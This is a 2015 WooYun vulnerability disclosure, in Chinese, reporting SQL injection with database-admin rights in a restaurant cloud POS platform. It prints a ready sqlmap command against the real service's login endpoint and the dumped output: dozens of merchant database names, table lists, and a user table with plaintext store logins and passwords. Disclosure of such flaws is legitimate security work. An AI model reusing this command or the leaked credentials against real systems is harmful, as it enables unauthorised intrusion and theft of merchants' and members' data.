当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089914

漏洞标题:某通用型餐饮业云pos管理平台sa权限注入(泄露大量账户信息)

相关厂商:上海赫思缔亚信息科技有限公司

漏洞作者: JulyTornado

提交时间:2015-01-04 15:28

修复时间:2015-04-04 15:30

公开时间:2015-04-04 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-12: 细节向第三方安全合作伙伴开放
2015-03-05: 细节向核心白帽子及相关领域专家公开
2015-03-15: 细节向普通白帽子公开
2015-03-25: 细节向实习白帽子公开
2015-04-04: 细节向公众公开

简要描述:

年輕人多讀書,不要那麼浮誇,無關的內容太多了,大量门店销售及会员信息,走应急吧。。。

详细说明:

首页.png


sqlmap -u "http://cpos168.com/Service.asmx/TryLogin" --data="username=admin&password=admin" -pusername --current-user --is-dba


sqlmap证明.png


sqlmap证明1.png

漏洞证明:

available databases [73]:
[*] cloudmenu
[*] CloudPOS_AnDongNi
[*] CloudPOS_Ayi
[*] CloudPOS_BaiWeiGuo
[*] CloudPOS_BaLiBaLi
[*] CloudPOS_BingTeLiCoffee
[*] CloudPOS_BolangCoffee
[*] CloudPOS_Cduoduo
[*] CloudPOS_ChaTime
[*] CloudPOS_Chatime_TW
[*] CloudPOS_Config_1
[*] CloudPOS_Demo_Baking
[*] CloudPOS_Demo_Drink
[*] CloudPOS_Demo_Pizza
[*] CloudPOS_Demo_Steak
[*] CloudPOS_FeiNiMoShu
[*] CloudPOS_ganjiangcun
[*] CloudPOS_GFresh_Cartoony
[*] CloudPOS_HaoDaDa
[*] CloudPOS_Hestia
[*] CloudPOS_HongPeiDaShi
[*] CloudPOS_Houxia_20120209
[*] CloudPOS_HuangJiaJiPai
[*] CloudPOS_HuoYuanJia
[*] CloudPOS_HuZaiShan_TW
[*] CloudPOS_Ireland_TW
[*] CloudPOS_JiDong
[*] CloudPOS_Jifentian
[*] CloudPOS_JiPaiChaoRen
[*] CloudPOS_Kongpeisi
[*] CloudPOS_KuBi
[*] CloudPOS_LanZhouJunHe
[*] CloudPOS_LaoTeng_TW
[*] CloudPOS_LeCai
[*] CloudPOS_LiuYiShou
[*] CloudPOS_London8shi
[*] CloudPOS_maishengli
[*] CloudPOS_Maldives_TW
[*] CloudPOS_Member
[*] CloudPOS_MianMianJuDao
[*] CloudPOS_NanFeiMilkTea
[*] CloudPOS_Peidu
[*] CloudPOS_Possmei_20120212
[*] CloudPOS_R_B
[*] CloudPOS_RBYiShi_TW
[*] CloudPOS_RoyalHost
[*] CloudPOS_SanChong_TW
[*] CloudPOS_Shalisha_TW
[*] CloudPOS_ShangJin
[*] CloudPOS_ShaXian
[*] CloudPOS_TBFengQing
[*] CloudPOS_Tosca_TW
[*] CloudPOS_UrbanPark_TW
[*] CloudPOS_WeiQun_TW
[*] CloudPOS_Wuchadao
[*] CloudPOS_XiKe
[*] CloudPOS_XindaoCoffee
[*] CloudPOS_XXCha_TW
[*] CloudPOS_Yadianna
[*] CloudPOS_YaMiPiSa
[*] CloudPOS_YangXinDian_TW
[*] CloudPOS_YangXinDianTemp_TW
[*] CloudPOS_YingTao
[*] CloudPOS_Yuanjiangjun
[*] CloudPOS_YuanShiZu
[*] CloudPOS_ZhaoTianQu
[*] CloudPOS_ZhongLiang
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: CloudPOS_Member
[28 tables]
+-------------------+
| Account |
| BGroupSAT |
| BSATFunction |
| Brand |
| BrandGroup |
| CBasicData |
| CFunction |
| CLevel |
| Card |
| CardExtension |
| DRuleEx_1 |
| DeductRule |
| DeductRule_1 |
| FormatApplication |
| FormatBatch |
| FormatBatch_View |
| FormatTemplate |
| Log |
| Member |
| MemberExpand |
| Member_View |
| RRuleEx |
| RechargeRule |
| Record |
| SATFunction |
| SubAccount |
| SubAccount_Type |
| TemplateFunction |
+-------------------+
Database: CloudPOS_HongPeiDaShi
[159 tables]
+------------------------+
| Area |
| Attendance |
| BProduct |
| BProduct_View |
| BasicData |
| CashRegister |
| CheckOut |
| CheckOutApr |
| CheckOutAug |
| CheckOutBill |
| CheckOutDec |
| CheckOutEed |
| CheckOutFeb |
| CheckOutJan |
| CheckOutJul |
| CheckOutJun |
| CheckOutMar |
| CheckOutMay |
| CheckOutNov |
| CheckOutOct |
| CheckOutSep |
| Client |
| ClientStatus |
| Desktop |
| DocumentFormat |
| Employee |
| ExpandData |
| Feeding |
| FloorArea |
| Functions |
| GiftCertificate |
| GiftCertificateDetail |
| GroupData |
| GroupFunction |
| Groups |
| Headquarters |
| Instruction |
| InvoiceDetail |
| InvoiceDetailApr |
| InvoiceDetailAug |
| InvoiceDetailDec |
| InvoiceDetailFeb |
| InvoiceDetailJan |
| InvoiceDetailJul |
| InvoiceDetailJun |
| InvoiceDetailMar |
| InvoiceDetailMay |
| InvoiceDetailNov |
| InvoiceDetailOct |
| InvoiceDetailSep |
| KeyFunction |
| Log |
| Machine |
| MachineBill |
| ManualInvoice |
| Module |
| OrderCustomer |
| OrderDetail |
| OrderDetailApr |
| OrderDetailAug |
| OrderDetailDec |
| OrderDetailEnd |
| OrderDetailFeb |
| OrderDetailJan |
| OrderDetailJul |
| OrderDetailJun |
| OrderDetailMar |
| OrderDetailMay |
| OrderDetailNov |
| OrderDetailOct |
| OrderDetailSep |
| OrderInformation |
| OrderInformationApr |
| OrderInformationAug |
| OrderInformationDec |
| OrderInformationEnd |
| OrderInformationFeb |
| OrderInformationJan |
| OrderInformationJul |
| OrderInformationJun |
| OrderInformationMar |
| OrderInformationMay |
| OrderInformationNov |
| OrderInformationOct |
| OrderInformationSep |
| OrderMealEnd |
| OrderRecord |
| OrderSubMeal |
| OrderSubMealApr |
| OrderSubMealAug |
| OrderSubMealDec |
| OrderSubMealFeb |
| OrderSubMealJan |
| OrderSubMealJul |
| OrderSubMealJun |
| OrderSubMealMar |
| OrderSubMealMay |
| OrderSubMealNov |
| OrderSubMealOct |
| OrderSubMealSep |
| OrderTable |
| OrderingRecord |
| PTemplate |
| Payment |
| PaymentDetail |
| PaymentDetailApr |
| PaymentDetailAug |
| PaymentDetailDec |
| PaymentDetailEnd |
| PaymentDetailFeb |
| PaymentDetailJan |
| PaymentDetailJul |
| PaymentDetailJun |
| PaymentDetailMar |
| PaymentDetailMay |
| PaymentDetailNov |
| PaymentDetailOct |
| PaymentDetailSep |
| PaymentType |
| PickupBill |
| PickupCustomer |
| Printer |
| Product |
| ProductCategory |
| ProductCategoryFeeding |
| ProductCategorySubMeal |
| ProductCategoryTaste |
| ProductExpand |
| ProductFeeding |
| ProductStore |
| ProductSubMeal |
| ProductTaste |
| Promotion |
| PromotionType |
| PunchCard |
| RegistrationKey |
| Rule |
| RuleContent |
| RuleTemplate |
| STemplate |
| Shift |
| Store |
| StoreDailyReport |
| StoreSet |
| StoreSetStore |
| SubMealGroup |
| SystemSetting |
| TableVersion |
| TakeOutCustomer |
| Taste |
| Template |
| TemplateData |
| TemporaryCustomer |
| TotalOrder |
| UserFunction |
| UserGroup |
| Users |
| VATTax |
| VTemplate |
+------------------------+
Database: CloudPOS_HongPeiDaShi
Table: Users
[9 entries]
+--------------------------------------+----------------+----------+------------+--------
--------+----------------------+-----------------+
| Users_ID | Users_Store_ID | Users_NO | Users_Name |
Users_IsEnable | Users_Password | Users_LoginName |
+--------------------------------------+----------------+----------+------------+--------
--------+----------------------+-----------------+
| 122D438F-00B4-456B-A1CE-D4D9E2DE54ED | NULL | ZJ01 | 张江店 | 1
| 123456 | ZJ01 |
| 4731D671-18E8-4D7A-AA86-3B602D0BC8D1 | NULL | JQ01 | 金桥店 | 1
| JQ01 | JQ01 |
| 7116B31C-623C-4548-AA2C-871378628267 | NULL | YZ01 | 扬州店 | 1
| YZ01 | YZ01 |
| A01824FC-DD30-46D1-A2E9-30D58AC90D6F | NULL | AD001 | 管理员 | 1
| 123 | hpds |
| B5151D7F-443B-4634-961E-31B3205CEFC8 | NULL | YX01 | 意翔店 | 1
| YX01 | YX01 |
| C35FAF03-E28E-4481-B137-FF472D855E3C | NULL | LY01 | 柳营店 | 1
| LY01 | LY01 |
| C7E5814C-BCBA-4318-8B0E-7EB866E5E35B | NULL | 01 | test01 | 1
| test | test01 |
| E5452673-09DC-4CAE-80D2-93DC2BF1FD49 | NULL | JJ01 | 靖江店 | 1
| JJ01 | JJ01 |
| E73D221A-D618-443F-9AE8-19B326074203 | NULL | SD01 | 江阴时代店 | 1
| SD01 | SD01 |
+--------------------------------------+----------------+----------+------------+--------
--------+----------------------+-----------------+


会员卡.png


会员卡1.png


10000条数据.png

修复方案:

过滤。。。

版权声明:转载请注明来源 JulyTornado@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-09 13:43

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论